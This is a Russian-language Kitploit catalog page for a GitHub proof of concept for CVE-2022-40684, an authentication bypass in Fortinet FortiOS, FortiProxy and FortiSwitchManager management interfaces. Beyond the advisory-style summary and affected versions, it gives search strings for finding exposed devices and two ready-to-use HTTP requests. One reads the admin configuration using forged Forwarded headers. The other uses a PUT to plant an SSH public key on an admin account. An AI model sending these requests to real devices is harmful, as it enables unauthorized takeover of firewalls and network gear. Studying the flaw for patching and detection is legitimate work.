Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-40684 — PoC и эксплойт для CVE-2022-40684, обход аутентификации в интерфейсах управления Fortinet FortiOS, FortiProxy и FortiSwitchManager, позволяющий получить несанкционированный административный доступ через специально сформированные HTTP-запросы. | Kitploit
Инструменты/GitHubGitHub/hughink/cve-2022-40684
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubhughink/cve-2022-40684

CVE-2022-40684

PoC и эксплойт для CVE-2022-40684, обход аутентификации в интерфейсах управления Fortinet FortiOS, FortiProxy и FortiSwitchManager, позволяющий получить несанкционированный административный доступ через специально сформированные HTTP-запросы.

Репозиторий
113243 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-40684

Соблюдение закона:

Любое физическое или юридическое лицо, использующее сеть, должно соблюдать конституционные законы, соблюдать общественный порядок, уважать общественную мораль, не наносить ущерб сетевой безопасности и не использовать сеть для действий, наносящих ущерб национальной безопасности, чести и интересам.

Краткое описание уязвимости:

Fortinet — всемирно известный поставщик продуктов и решений для сетевой безопасности, включая брандмауэры, антивирусное программное обеспечение, системы предотвращения вторжений и компоненты защиты конечных точек. В интерфейсе управления затронутых продуктов FortiOS, FortiProxy и FortiSwitchManager можно обойти аутентификацию, используя альтернативный путь или канал, и выполнять операции в интерфейсе управления без аутентификации с помощью специально созданных HTTP- или HTTPS-запросов.

Уровень риска:

Высокий

Затронутые версии:

FortiOS версии 7.2.0 - 7.2.1 FortiOS версии 7.0.0 - 7.0.6 FortiProxy версии 7.2.0 FortiProxy версии 7.0.0 - 7.0.6 FortiSwitchManager версии 7.2.0 FortiSwitchManager версии 7.0.0

Определение активов:

title="FortiProxy“

title="FortiGate"

Воспроизведение уязвимости:

poc

image

root@kitploit:~
GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

EXP

image

root@kitploit:~
PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json

{"ssh-public-key1": "\"公钥内容\""}

image

image

Скачать инструмент